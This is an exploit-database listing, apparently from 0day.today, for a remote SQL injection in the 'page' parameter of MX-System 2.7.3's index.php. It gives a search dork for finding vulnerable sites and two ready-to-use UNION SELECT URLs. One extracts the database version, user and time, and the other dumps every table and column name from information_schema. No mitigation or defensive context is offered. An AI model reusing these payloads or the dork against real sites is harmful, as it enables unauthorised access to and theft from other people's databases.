[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability

Author
cOndemned
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3055
Category
web applications
Date add
19-05-2008
Platform
unsorted
===================================================================
MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability
===================================================================



Name   : MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability
Author : cOndemned
Dork   : intext:Powered by MX-System 2.7.3
Greetz : ZaBeaTy, doctor, Avantura </3

PoC :

    http://[target]/[path]/index.php?page=-1+union+select+1,2,3,4,5,concat_ws(char(58),version(),user(),now())/*
    http://[target]/[path]/index.php?page=-1+union+select+1,2,3,4,5,concat(table_name,char(58),column_name)+from+information_schema.columns/*
    
    SQL query will generate error page containing requested informations.



#  0day.today [2024-12-26]  #